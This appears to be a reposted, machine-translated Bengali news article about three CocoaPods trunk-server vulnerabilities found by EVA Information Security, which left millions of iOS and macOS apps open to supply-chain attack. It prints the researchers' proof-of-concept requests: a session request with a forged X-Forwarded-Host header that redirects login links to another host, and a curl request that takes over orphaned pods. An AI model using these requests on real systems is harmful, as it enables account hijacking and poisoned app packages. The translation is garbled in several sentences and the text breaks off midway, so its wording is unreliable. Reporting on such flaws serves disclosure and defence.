3 মিলিয়ন iOS এবং macOS অ্যাপ শক্তিশালী সাপ্লাই-চেইন আক্রমণের সম্মুখীন হয়েছে

3 মিলিয়ন iOS এবং macOS অ্যাপ শক্তিশালী সাপ্লাই-চেইন আক্রমণের সম্মুখীন হয়েছে

অরিচ লসন

এক দশক ধরে শনাক্ত না হওয়া দুর্বলতা হাজার হাজার ম্যাকওএস এবং আইওএস অ্যাপকে সাপ্লাই-চেইন আক্রমণের জন্য সংবেদনশীল করে রেখেছে। হ্যাকাররা দূষিত কোড যোগ করতে পারে যারা তাদের ইনস্টল করেছে এমন লক্ষ লক্ষ বা বিলিয়ন লোকের নিরাপত্তার সাথে আপস করে, গবেষকরা সোমবার বলেছেন।

দুর্বলতা, যা গত অক্টোবরে স্থির করা হয়েছিল, পরিচালনা করার জন্য ব্যবহৃত একটি “ট্রাঙ্ক” সার্ভারে থাকে কোকোপডস, ওপেন সোর্স সুইফ্ট এবং অবজেক্টিভ-সি প্রকল্পগুলির জন্য একটি সংগ্রহস্থল যা প্রায় 3 মিলিয়ন macOS এবং iOS অ্যাপের উপর নির্ভর করে। যখন ডেভেলপাররা তাদের “পড”-এর একটিতে পরিবর্তন করে—স্বতন্ত্র কোড প্যাকেজের জন্য CocoaPods লিংগো—নির্ভর অ্যাপগুলি সাধারণত অ্যাপ আপডেটের মাধ্যমে স্বয়ংক্রিয়ভাবে তাদের অন্তর্ভুক্ত করে, সাধারণত শেষ ব্যবহারকারীদের দ্বারা কোনো ইন্টারঅ্যাকশনের প্রয়োজন হয় না।

কোড ইনজেকশন দুর্বলতা

“অনেক অ্যাপ্লিকেশন ব্যবহারকারীর সবচেয়ে সংবেদনশীল তথ্য অ্যাক্সেস করতে পারে: ক্রেডিট কার্ডের বিবরণ, চিকিৎসা রেকর্ড, ব্যক্তিগত সামগ্রী এবং আরও অনেক কিছু,” লিখেছেন ইভা ইনফরমেশন সিকিউরিটির গবেষকরা, যে ফার্মটি দুর্বলতা আবিষ্কার করেছে। “এই অ্যাপ্লিকেশানগুলিতে কোড ইনজেক্ট করা আক্রমণকারীদের প্রায় কোনও দূষিত উদ্দেশ্যের জন্য এই তথ্য অ্যাক্সেস করতে সক্ষম করতে পারে – র্যানসমওয়্যার, জালিয়াতি, ব্ল্যাকমেইল, কর্পোরেট গুপ্তচরবৃত্তি… প্রক্রিয়ায়, এটি কোম্পানিগুলিকে বড় আইনি দায়বদ্ধতা এবং সুনামগত ঝুঁকির মুখোমুখি করতে পারে।”

তিনটি দুর্বলতা EVA আবিষ্কার করেছে একটি অনিরাপদ যাচাইকরণ ইমেল পদ্ধতি থেকে যা পৃথক পডের বিকাশকারীদের প্রমাণীকরণ করতে ব্যবহৃত হয়। বিকাশকারী তাদের পডের সাথে যুক্ত ইমেল ঠিকানা প্রবেশ করান৷ ট্রাঙ্ক সার্ভার ঠিকানায় একটি লিঙ্ক পাঠিয়ে সাড়া দিয়েছে। যখন একজন ব্যক্তি লিঙ্কটিতে ক্লিক করেন, তখন তারা অ্যাকাউন্টে অ্যাক্সেস পান।

একটি ক্ষেত্রে, আক্রমণকারী আক্রমণকারীর নিয়ন্ত্রণে থাকা একটি সার্ভারের দিকে নির্দেশ করার জন্য লিঙ্কের URL-কে ম্যানিপুলেট করতে পারে। সার্ভার একটি জালিয়াতি গ্রহণ করেছে এক্সএফএইচ, একটি HTTP অনুরোধে নির্দিষ্ট করা লক্ষ্য হোস্ট সনাক্ত করার জন্য একটি HTTP শিরোনাম। EVA গবেষকরা খুঁজে পেয়েছেন যে তারা তাদের পছন্দের URL তৈরি করতে একটি নকল XFH ব্যবহার করতে পারে।

সাধারণত, ইমেলে CocoaPods.org সার্ভারে পোস্ট করা একটি বৈধ লিঙ্ক থাকবে যেমন:

একটি বৈধ যাচাইকরণ ইমেল কেমন দেখায়।
বড় করা / একটি বৈধ যাচাইকরণ ইমেল কেমন দেখায়।

ইভা তথ্য নিরাপত্তা

গবেষকরা পরিবর্তে তাদের নিজস্ব সার্ভারে নেতৃত্ব দিতে URL পরিবর্তন করতে পারে:

এটি ম্যানিপুলেট করা হয়েছে পরে একটি ইমেল যাচাইকরণ.
বড় করা / এটি ম্যানিপুলেট করা হয়েছে পরে একটি ইমেল যাচাইকরণ.

ইভা তথ্য নিরাপত্তা

এই দুর্বলতা, CVE-2024-38367 হিসাবে ট্র্যাক করা হয়েছে, ট্রাঙ্ক সার্ভার সোর্স কোডের সেশন_কন্ট্রোলার ক্লাসে থাকে, যা সেশনের বৈধতা URL পরিচালনা করে। ক্লাসটি sessions_controller.rb মেকানিজম ব্যবহার করে, যা মূল হোস্ট হেডারের উপর XFH কে অগ্রাধিকার দেয়। গবেষকদের শোষণ কোড ছিল:

POST /api/v1/sessions HTTP/1.1
Host: trunk.cococapods.org
Content-Type: application/json; charset=utf-8
Accept: application/json; charset=utf-8
User-Agent: CocoaPods/1.12.1
Accept-Encoding: gzip, deflate
X-Forwarded-Host: research.evasec.io
Content-Length: 78

{
  "email":"research@evasec.io",
  "name":"EVAResearch",
  "description":null
}

CVE-2024-38368 হিসাবে ট্র্যাক করা একটি পৃথক দুর্বলতা আক্রমণকারীদের পডগুলির নিয়ন্ত্রণ নিতে দেয় যা তাদের ডেভেলপারদের দ্বারা পরিত্যাগ করা হয়েছিল কিন্তু অ্যাপগুলির দ্বারা ব্যবহার করা অব্যাহত রয়েছে৷ একটি প্রোগ্রামিং ইন্টারফেস যা ডেভেলপারদের তাদের পড পুনরুদ্ধার করার অনুমতি দেয় এটি প্রথম প্রয়োগের প্রায় 10 বছর পরে সক্রিয় ছিল। গবেষকরা দেখেছেন যে যে কেউ অনাথ পডের ইন্টারফেসটি খুঁজে পেয়েছেন তারা এটির উপর নিয়ন্ত্রণ পেতে এটি সক্রিয় করতে পারে, মালিকানা প্রমাণের প্রয়োজন নেই।

আমার স্নাতকের কার্ল যে অনুরোধে পডের নাম ছিল তা সবই প্রয়োজন ছিল:

# Curl request for changing ownership of a targeted orphaned pod
curl -X 'POST' \
  -H 'Host: trunk.cocoapods.org' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-binary 'owner[name]=EVA&email=research@evasec.io'
  --data-binary 'pods[]=[TARGET_UNCLAIMED_POD]&button=SEND'
  'https://trunk.cocoapods.org/claims'

তৃতীয় দুর্বলতা, CVE-2024-38366, আক্রমণকারীদের ট্রাঙ্ক সার্ভারে কোড চালানোর অনুমতি দেয়। ট্রাঙ্ক সার্ভারের উপর নির্ভর করে RFC822 নিবন্ধিত বিকাশকারীর ইমেল ঠিকানাগুলির স্বতন্ত্রতা যাচাই করতে এবং তারা সঠিক বিন্যাস অনুসরণ করে কিনা তা যাচাই করতে 1982 সালে আনুষ্ঠানিকভাবে রূপান্তরিত হয়। প্রক্রিয়ার অংশ পরীক্ষা জড়িত MX রেকর্ড দ্বারা বাস্তবায়িত ইমেল ঠিকানা ডোমেনের জন্য এই RFC822 বাস্তবায়ন।

Source link

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *

Raytahost Facebook Sharing Powered By : Raytahost.com